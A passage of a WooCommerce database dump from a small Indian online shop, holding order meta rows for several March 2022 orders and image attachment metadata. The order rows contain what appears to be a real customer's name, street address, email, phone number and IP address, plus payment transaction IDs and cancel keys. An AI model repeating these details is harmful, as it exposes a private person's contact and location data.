layout'),(6336,1198,'_billing_city','bangalore'),(6337,1198,'_billing_state','KA'),(6338,1198,'_billing_postcode','560102'),(6339,1198,'_billing_country','IN'),(6340,1198,'_billing_email','nijo101196@gmail.com'),(6341,1198,'_billing_phone','9353137538'),(6342,1198,'_shipping_first_name','bavani'),(6343,1198,'_shipping_last_name','p'),(6344,1198,'_shipping_address_1','800 ,spandana towers'),(6345,1198,'_shipping_address_2','hsr layout'),(6346,1198,'_shipping_city','bangalore'),(6347,1198,'_shipping_state','KA'),(6348,1198,'_shipping_postcode','560102'),(6349,1198,'_shipping_country','IN'),(6350,1198,'_order_currency','INR'),(6351,1198,'_cart_discount','0'),(6352,1198,'_cart_discount_tax','0'),(6353,1198,'_order_shipping','20'),(6354,1198,'_order_shipping_tax','0'),(6355,1198,'_order_tax','0'),(6356,1198,'_order_total','153.00'),(6357,1198,'_order_version','6.2.1'),(6358,1198,'_prices_include_tax','no'),(6359,1198,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN nijo101196@gmail.com 9353137538'),(6360,1198,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6361,1198,'is_vat_exempt','no'),(6362,1198,'_wc_cancel_key','8a501c9483668ad7ee2464bdaee8a830'),(6363,1198,'_wcfmmp_order_processed','yes'),(6364,1198,'is_magic_checkout_order','no'),(6365,1198,'_transaction_id','pay_J47AIFiWisWXWl'),(6366,1198,'_date_paid','1646637655'),(6367,1198,'_paid_date','2022-03-07 12:50:55'),(6368,1198,'_download_permissions_granted','yes'),(6369,1198,'_recorded_sales','yes'),(6370,1198,'_recorded_coupon_usage_counts','yes'),(6371,1198,'_order_stock_reduced','yes'),(6372,1198,'_wcfm_new_order_notified','yes'),(6373,1198,'_wcfm_membership_order_processed','yes'),(6374,1198,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6375,1198,'_wcpdf_invoice_date','1646637656'),(6376,1198,'_wcpdf_invoice_date_formatted','2022-03-07 12:50:56'),(6377,1198,'_wcpdf_invoice_number','4'),(6378,1198,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:4;s:16:\"formatted_number\";s:1:\"4\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1198;s:7:\"padding\";N;}'),(6379,1198,'_new_order_email_sent','true'),(6380,1198,'_wcfmmp_order_email_triggered','yes'),(6382,1199,'_order_key','wc_order_6uJFdYWpcQo3x'),(6383,1199,'_customer_user','26'),(6384,1199,'_payment_method','razorpay'),(6385,1199,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6386,1199,'_customer_ip_address','223.226.34.15'),(6387,1199,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6388,1199,'_created_via','checkout'),(6389,1199,'_cart_hash','5af8b4613c3c8e62ac60b6571f7d047f'),(6390,1199,'_billing_first_name','bavani'),(6391,1199,'_billing_last_name','p'),(6392,1199,'_billing_address_1','800 ,spandana towers'),(6393,1199,'_billing_address_2','hsr layout'),(6394,1199,'_billing_city','bangalore'),(6395,1199,'_billing_state','KA'),(6396,1199,'_billing_postcode','560102'),(6397,1199,'_billing_country','IN'),(6398,1199,'_billing_email','nijo101196@gmail.com'),(6399,1199,'_billing_phone','9353137538'),(6400,1199,'_shipping_first_name','bavani'),(6401,1199,'_shipping_last_name','p'),(6402,1199,'_shipping_address_1','800 ,spandana towers'),(6403,1199,'_shipping_address_2','hsr layout'),(6404,1199,'_shipping_city','bangalore'),(6405,1199,'_shipping_state','KA'),(6406,1199,'_shipping_postcode','560102'),(6407,1199,'_shipping_country','IN'),(6408,1199,'_order_currency','INR'),(6409,1199,'_cart_discount','0'),(6410,1199,'_cart_discount_tax','0'),(6411,1199,'_order_shipping','40'),(6412,1199,'_order_shipping_tax','0'),(6413,1199,'_order_tax','0'),(6414,1199,'_order_total','235.00'),(6415,1199,'_order_version','6.2.1'),(6416,1199,'_prices_include_tax','no'),(6417,1199,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN nijo101196@gmail.com 9353137538'),(6418,1199,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6419,1199,'is_vat_exempt','no'),(6420,1199,'_wc_cancel_key','b51a20ad94fb2010cd436e6080b6b31e'),(6421,1199,'_wcfmmp_order_processed','yes'),(6422,1199,'is_magic_checkout_order','no'),(6423,1199,'_transaction_id','pay_J47CoPwV40zzLJ'),(6424,1199,'_date_paid','1646637798'),(6425,1199,'_paid_date','2022-03-07 12:53:18'),(6426,1199,'_download_permissions_granted','yes'),(6427,1199,'_recorded_sales','yes'),(6428,1199,'_recorded_coupon_usage_counts','yes'),(6429,1199,'_order_stock_reduced','yes'),(6430,1199,'_wcfm_new_order_notified','yes'),(6431,1199,'_wcfm_membership_order_processed','yes'),(6432,1199,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6433,1199,'_wcpdf_invoice_date','1646637799'),(6434,1199,'_wcpdf_invoice_date_formatted','2022-03-07 12:53:19'),(6435,1199,'_wcpdf_invoice_number','5'),(6436,1199,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:5;s:16:\"formatted_number\";s:1:\"5\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1199;s:7:\"padding\";N;}'),(6437,1199,'_new_order_email_sent','true'),(6438,1199,'_wcfmmp_order_email_triggered','yes'),(6452,1200,'_order_key','wc_order_3NTW8pGkAmPa6'),(6453,1200,'_customer_user','26'),(6454,1200,'_payment_method','razorpay'),(6455,1200,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6456,1200,'_customer_ip_address','223.226.34.15'),(6457,1200,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6458,1200,'_created_via','checkout'),(6459,1200,'_cart_hash','c6072e2a670a299d154b5aa6abb7faea'),(6460,1200,'_billing_first_name','bavani'),(6461,1200,'_billing_last_name','p'),(6462,1200,'_billing_address_1','800 ,spandana towers'),(6463,1200,'_billing_address_2','hsr layout'),(6464,1200,'_billing_city','bangalore'),(6465,1200,'_billing_state','KA'),(6466,1200,'_billing_postcode','560102'),(6467,1200,'_billing_country','IN'),(6468,1200,'_billing_email','nijo101196@gmail.com'),(6469,1200,'_billing_phone','9353137538'),(6470,1200,'_shipping_first_name','bavani'),(6471,1200,'_shipping_last_name','p'),(6472,1200,'_shipping_address_1','800 ,spandana towers'),(6473,1200,'_shipping_address_2','hsr layout'),(6474,1200,'_shipping_city','bangalore'),(6475,1200,'_shipping_state','KA'),(6476,1200,'_shipping_postcode','560102'),(6477,1200,'_shipping_country','IN'),(6478,1200,'_order_currency','INR'),(6479,1200,'_cart_discount','0'),(6480,1200,'_cart_discount_tax','0'),(6481,1200,'_order_shipping','20'),(6482,1200,'_order_shipping_tax','0'),(6483,1200,'_order_tax','0'),(6484,1200,'_order_total','120.00'),(6485,1200,'_order_version','6.2.1'),(6486,1200,'_prices_include_tax','no'),(6487,1200,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN nijo101196@gmail.com 9353137538'),(6488,1200,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6489,1200,'is_vat_exempt','no'),(6490,1200,'_order_has_preorder','yes'),(6491,1200,'_wcfmmp_order_processed','yes'),(6492,1200,'_wc_cancel_key','190cae48cebb9236e5507e07e0ea609e'),(6493,1200,'is_magic_checkout_order','no'),(6494,1200,'_transaction_id','pay_J47PCDHbH8uSm5'),(6495,1200,'_date_paid','1646638501'),(6496,1200,'_paid_date','2022-03-07 13:05:01'),(6497,1200,'_download_permissions_granted','yes'),(6498,1200,'_recorded_sales','yes'),(6499,1200,'_recorded_coupon_usage_counts','yes'),(6500,1200,'_order_stock_reduced','yes'),(6501,1200,'_wcfm_new_order_notified','yes'),(6502,1200,'_wcfm_membership_order_processed','yes'),(6503,1200,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6504,1200,'_wcpdf_invoice_date','1646638502'),(6505,1200,'_wcpdf_invoice_date_formatted','2022-03-07 13:05:02'),(6506,1200,'_wcpdf_invoice_number','6'),(6507,1200,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:6;s:16:\"formatted_number\";s:1:\"6\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1200;s:7:\"padding\";N;}'),(6508,1200,'_new_order_email_sent','true'),(6509,1200,'_wcfmmp_order_email_triggered','yes'),(6510,1201,'_order_key','wc_order_594oCWQX1EAhs'),(6511,1201,'_customer_user','26'),(6512,1201,'_payment_method','razorpay'),(6513,1201,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6514,1201,'_customer_ip_address','223.226.34.15'),(6515,1201,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6516,1201,'_created_via','checkout'),(6517,1201,'_cart_hash','b8856d0d95fa4af92de36427db619e2b'),(6518,1201,'_billing_first_name','bavani'),(6519,1201,'_billing_last_name','p'),(6520,1201,'_billing_address_1','800 ,spandana towers'),(6521,1201,'_billing_address_2','hsr layout'),(6522,1201,'_billing_city','bangalore'),(6523,1201,'_billing_state','KA'),(6524,1201,'_billing_postcode','560102'),(6525,1201,'_billing_country','IN'),(6526,1201,'_billing_email','nijo101196@gmail.com'),(6527,1201,'_billing_phone','9353137538'),(6528,1201,'_shipping_first_name','bavani'),(6529,1201,'_shipping_last_name','p'),(6530,1201,'_shipping_address_1','800 ,spandana towers'),(6531,1201,'_shipping_address_2','hsr layout'),(6532,1201,'_shipping_city','bangalore'),(6533,1201,'_shipping_state','KA'),(6534,1201,'_shipping_postcode','560102'),(6535,1201,'_shipping_country','IN'),(6536,1201,'_order_currency','INR'),(6537,1201,'_cart_discount','0'),(6538,1201,'_cart_discount_tax','0'),(6539,1201,'_order_shipping','10'),(6540,1201,'_order_shipping_tax','0'),(6541,1201,'_order_tax','0'),(6542,1201,'_order_total','205.00'),(6543,1201,'_order_version','6.2.1'),(6544,1201,'_prices_include_tax','no'),(6545,1201,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN nijo101196@gmail.com 9353137538'),(6546,1201,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6547,1201,'is_vat_exempt','no'),(6548,1201,'_order_has_preorder','yes'),(6549,1201,'_wcfmmp_order_processed','yes'),(6550,1201,'_wc_cancel_key','f18d40615242963a7289effd084a6e01'),(6551,1201,'is_magic_checkout_order','no'),(6552,1201,'_transaction_id','pay_J49Rn46vEzO65k'),(6553,1201,'_date_paid','1646645692'),(6554,1201,'_paid_date','2022-03-07 15:04:52'),(6555,1201,'_download_permissions_granted','yes'),(6556,1201,'_recorded_sales','yes'),(6557,1201,'_recorded_coupon_usage_counts','yes'),(6558,1201,'_order_stock_reduced','yes'),(6559,1201,'_wcfm_new_order_notified','yes'),(6560,1201,'_wcfm_membership_order_processed','yes'),(6561,1201,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6562,1201,'_wcpdf_invoice_date','1646645693'),(6563,1201,'_wcpdf_invoice_date_formatted','2022-03-07 15:04:53'),(6564,1201,'_wcpdf_invoice_number','7'),(6565,1201,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:7;s:16:\"formatted_number\";s:1:\"7\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1201;s:7:\"padding\";N;}'),(6566,1201,'_new_order_email_sent','true'),(6567,1201,'_wcfmmp_order_email_triggered','yes'),(6568,1202,'_order_key','wc_order_uBJmJN1aIVtUI'),(6569,1202,'_customer_user','1'),(6570,1202,'_payment_method','razorpay'),(6571,1202,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6572,1202,'_customer_ip_address','223.226.34.15'),(6573,1202,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6574,1202,'_created_via','checkout'),(6575,1202,'_cart_hash','6d7c731d640d1782a4bd466a45da7982'),(6576,1202,'_billing_first_name','bavani'),(6577,1202,'_billing_last_name','p'),(6578,1202,'_billing_address_1','800 ,spandana towers'),(6579,1202,'_billing_address_2','hsr layout'),(6580,1202,'_billing_city','bangalore'),(6581,1202,'_billing_state','KA'),(6582,1202,'_billing_postcode','560078'),(6583,1202,'_billing_country','IN'),(6584,1202,'_billing_email','mango@homedirect.in'),(6585,1202,'_billing_phone','123456'),(6586,1202,'_shipping_first_name','bavani'),(6587,1202,'_shipping_last_name','p'),(6588,1202,'_shipping_address_1','800 ,spandana towers'),(6589,1202,'_shipping_address_2','hsr layout'),(6590,1202,'_shipping_city','bangalore'),(6591,1202,'_shipping_state','KA'),(6592,1202,'_shipping_postcode','560078'),(6593,1202,'_shipping_country','IN'),(6594,1202,'_order_currency','INR'),(6595,1202,'_cart_discount','0'),(6596,1202,'_cart_discount_tax','0'),(6597,1202,'_order_shipping','10'),(6598,1202,'_order_shipping_tax','0'),(6599,1202,'_order_tax','0'),(6600,1202,'_order_total','609.00'),(6601,1202,'_order_version','6.9.4'),(6602,1202,'_prices_include_tax','no'),(6603,1202,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN mango@homedirect.in 123456'),(6604,1202,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN '),(6606,1202,'_order_has_preorder','yes'),(6607,1202,'_wcfmmp_order_processed','yes'),(6608,1202,'_wc_cancel_key','b0c5ee2cc9666400cab6cf39fcd53f01'),(6609,1202,'is_magic_checkout_order','no'),(6611,1203,'_edit_lock','1646651255:1'),(6612,1204,'_edit_lock','1647432415:1'),(6618,1207,'_wp_attached_file','2022/03/logo-01.png'),(6619,1207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4167;s:6:\"height\";i:4167;s:4:\"file\";s:19:\"2022/03/logo-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"logo-01-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"logo-01-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"logo-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"logo-01-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"logo-01-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"logo-01-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"logo-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:17:\"logo-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"logo-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"logo-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"logo-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"logo-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"logo-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"logo-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6631,1212,'_wp_attached_file','2022/03/l-2-01.png'),(6632,1212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2084;s:6:\"height\";i:2084;s:4:\"file\";s:18:\"2022/03/l-2-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"l-2-01-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"l-2-01-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"l-2-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"l-2-01-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"l-2-01-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:20:\"l-2-01-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"l-2-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:16:\"l-2-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"l-2-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"l-2-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"l-2-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"l-2-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:16:\"l-2-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:16:\"l-2-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6636,1215,'_wp_attached_file','2022/03/l3-01.png'),(6637,1215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4167;s:6:\"height\";i:4167;s:4:\"file\";s:17:\"2022/03/l3-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"l3-01-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"l3-01-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"l3-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"l3-01-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:19:\"l3-01-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:19:\"l3-01-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:17:\"l3-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"l3-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"l3-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"l3-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"l3-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"l3-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"l3-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"l3-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6638,1216,'_wp_attached_file','2022/03/cropped-l3-01.png'),(6639,1216,'_wp_attachment_context','site-icon'),(6640,1216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:25:\"2022/03/cropped-l3-01.png\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"cropped-l3-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"cropped-l3-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"cropped-l3-01-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-l3-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"cropped-l3-01-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9: